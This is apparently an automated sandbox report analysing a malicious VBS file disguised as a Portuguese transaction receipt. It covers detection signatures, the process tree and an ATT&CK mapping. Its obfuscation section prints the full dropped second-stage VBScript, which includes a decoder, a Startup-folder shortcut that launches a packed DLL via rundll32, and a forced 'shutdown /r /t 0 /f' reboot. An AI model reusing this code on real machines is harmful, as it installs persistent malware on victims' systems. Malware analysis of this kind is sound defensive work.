
Analysis Report Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs

Overview

General Information

Sample Name: Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs
MD5: 3fde400fc6c3b401e9e934699907766c
SHA1: 59fa542d34f771eb4e1854a834facad18b1f4cec
SHA256: 3e018a8015f3f7eda7b3e365696e355a23bf4f85cacbbd770679e3f47ef34006

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Detected VMProtect packer
Potential malicious VBS script found (has network functionality)
Uses shutdown.exe to shutdown or reboot the system
Windows Shell Script Host drops VBS files
Abnormal high CPU Usage
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains more sections than normal
PE file contains sections with non-standard names
Stores files to the Windows start menu directory

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4088 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2348 cmdline: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Roaming\yceriobfmby.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • cmd.exe (PID: 4880 cmdline: 'C:\Windows\system32\cmd.exe' /c shutdown /r /t 0 /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 3124 cmdline: shutdown /r /t 0 /f MD5: 7A22F98F0B7BAEEF5FE1965F075A5E95)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Networking:

Potential malicious VBS script found (has network functionality)
Source: Initial file | .write AfAhzrVQObdwtbt.responseBody
Source: Initial file | .savetofile ZJEisxjDhYWidBT, 2
Source: Initial file | .write RyUBeNIaQfQLihm.responseBody
Source: Initial file | .savetofile iXSQMaJGkdjPzoJ, 2
Source: Joe Sandbox View | IP Address: 8.8.8.8
Source: Joe Sandbox View | ASN Name: GOOGLEUS

System Summary:

Detected VMProtect packer
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.dr | Static PE information: .vmp0 and .vmp1 section names
Uses shutdown.exe to shutdown or reboot the system
Source: unknown | Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\System32\wscript.exe | Process Stats: CPU usage > 98%
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\42753758370875\ikqctrlzpdlhcixyi45641149401664.dll D0B495A0C5EFFFEE00639CEE980BF6E9A0F68DDF732078AF6132EF2228930356
Source: Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs | Initial sample: Strings found which are bigger than 50
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.dr | Static PE information: Number of sections : 13 > 10
Source: classification engine | Classification label: mal80.rans.evad.winVBS@8/4@0/2
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\42753758370875
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_01
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Anexo-comprovativo-de-transaccao-N-jf5h3az8xc6-DOC-469.vbs'
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Roaming\yceriobfmby.vbs
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c shutdown /r /t 0 /f
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Roaming\yceriobfmby.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c shutdown /r /t 0 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: CreateTextFile("C:\Users\user\AppData\Roaming\yceriobfmby.vbs", "true");ITextStream.Write("Private Function FHNoXAfQuyoucjV(OQBBMSfITHUTkpo)");ITextStream.Write("Const oYdCZgXJrzdkjqs = 10");ITextStream.Write("Const WxZdsgiOJluAzIe = 33");ITextStream.Write("Const BzOeQNeUBlLuOlt = 126");ITextStream.Write("If Len(OQBBMSfITHUTkpo) < 5 Then");ITextStream.Write("FHNoXAfQuyoucjV = """);ITextStream.Write("Exit Function");ITextStream.Write("End If");ITextStream.Write("Dim DYTIiRrCaEXbHFU");ITextStream.Write("OQBBMSfITHUTkpo = Mid(OQBBMSfITHUTkpo,3,Len(OQBBMSfITHUTkpo)-4)");ITextStream.Write("For i=2 To Len(OQBBMSfITHUTkpo) Step 2");ITextStream.Write("rvJQIiQcVTjTPlg = Asc(Mid(OQBBMSfITHUTkpo,i,1)) + oYdCZgXJrzdkjqs");ITextStream.Write("If rvJQIiQcVTjTPlg > BzOeQNeUBlLuOlt Then");ITextStream.Write("rvJQIiQcVTjTPlg = rvJQIiQcVTjTPlg - BzOeQNeUBlLuOlt + WxZdsgiOJluAzIe - 1");ITextStream.Write("End If");ITextStream.Write("DYTIiRrCaEXbHFU = DYTIiRrCaEXbHFU & Chr(rvJQIiQcVTjTPlg)");ITextStream.Write("Next");ITextStream.Write("FHNoXAfQuyoucjV = DYTIiRrCaEXbHFU");ITextStream.Write("End Function");ITextStream.Write("Dim PhezsyWTUjntpDv");ITextStream.Write("Set PhezsyWTUjntpDv = Wscript.CreateObject("Wscript.Shell")");ITextStream.Write("QNFxwHBnnsfsuCZ = PhezsyWTUjntpDv.SpecialFolders("StartUp") & "\yceriobfmby"");ITextStream.Write("Set ZnEuOfdeevGHQSV= WScript.CreateObject("WScript.Shell")");ITextStream.Write("Set bnYwXGlvmHYquzJ = ZnEuOfdeevGHQSV.CreateShortcut(QNFxwHBnnsfsuCZ & ".lnk")");ITextStream.Write("bnYwXGlvmHYquzJ.TargetPath = "rundll32"");ITextStream.Write("bnYwXGlvmHYquzJ.Arguments = "C:\Users\user\AppData\Roaming\42753758370875\ikqctrlzpdlhcixyi45641149401664.dll YourGonnaPayMeToday"");ITextStream.Write("bnYwXGlvmHYquzJ.WindowStyle = 1 ");ITextStream.Write("bnYwXGlvmHYquzJ.WorkingDirectory = QNFxwHBnnsfsuCZ");ITextStream.Write("bnYwXGlvmHYquzJ.Save");ITextStream.Write("Dim UziinLJLMfbmsvq ");ITextStream.Write("Set UziinLJLMfbmsvq = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(30000)");ITextStream.Write("UziinLJLMfbmsvq.Run"%comspec% /c shutdown /r /t 0 /f", , True ");ITextStream.Close();IWshShell3.Run("wscript C:\Users\user\AppData\Roaming\yceriobfmby.vbs")
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.dr | Static PE information: section name: .didata
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.dr | Static PE information: section name: .vmp0
Source: ikqctrlzpdlhcixyi45641149401664.dll.0.dr | Static PE information: section name: .vmp1

Persistence and Installation Behavior:

Windows Shell Script Host drops VBS files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\yceriobfmby.vbs
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\42753758370875\ikqctrlzpdlhcixyi45641149401664.dll

Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yceriobfmby.lnk

Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\42753758370875\ikqctrlzpdlhcixyi45641149401664.dll
Source: shutdown.exe, 0000000C.00000002.1113771765.0000029F0E3D0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: shutdown.exe, 0000000C.00000002.1113771765.0000029F0E3D0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: shutdown.exe, 0000000C.00000002.1113771765.0000029F0E3D0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: shutdown.exe, 0000000C.00000002.1113771765.0000029F0E3D0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: ikqctrlzpdlhcixyi45641149401664.dll.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 216.58.212.144 187
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Roaming\yceriobfmby.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c shutdown /r /t 0 /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 0 /f

Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Techniques are listed per tactic column of the matrix; a number in square brackets is the signature count shown against that technique in the report.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: PowerShell; Scripting [321]; Exploitation for Client Execution [1]; Scheduled Task
Persistence: Startup Items [1]; Registry Run Keys / Startup Folder [2]; Accessibility Features; System Firmware
Privilege Escalation: Startup Items [1]; Process Injection [111]; Path Interception; DLL Search Order Hijacking
Defense Evasion: Masquerading [1]; Process Injection [111]; Scripting [321]; Obfuscated Files or Information [1]
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files
Discovery: Security Software Discovery [1]; Remote System Discovery [1]; File and Directory Discovery [1]; System Information Discovery [2]
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted
Command and Control: Data Obfuscation; Fallback Channels; Custom Cryptographic Protocol; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot [1]; Device Lockout; Delete Device Data; Premium SMS Toll Fraud
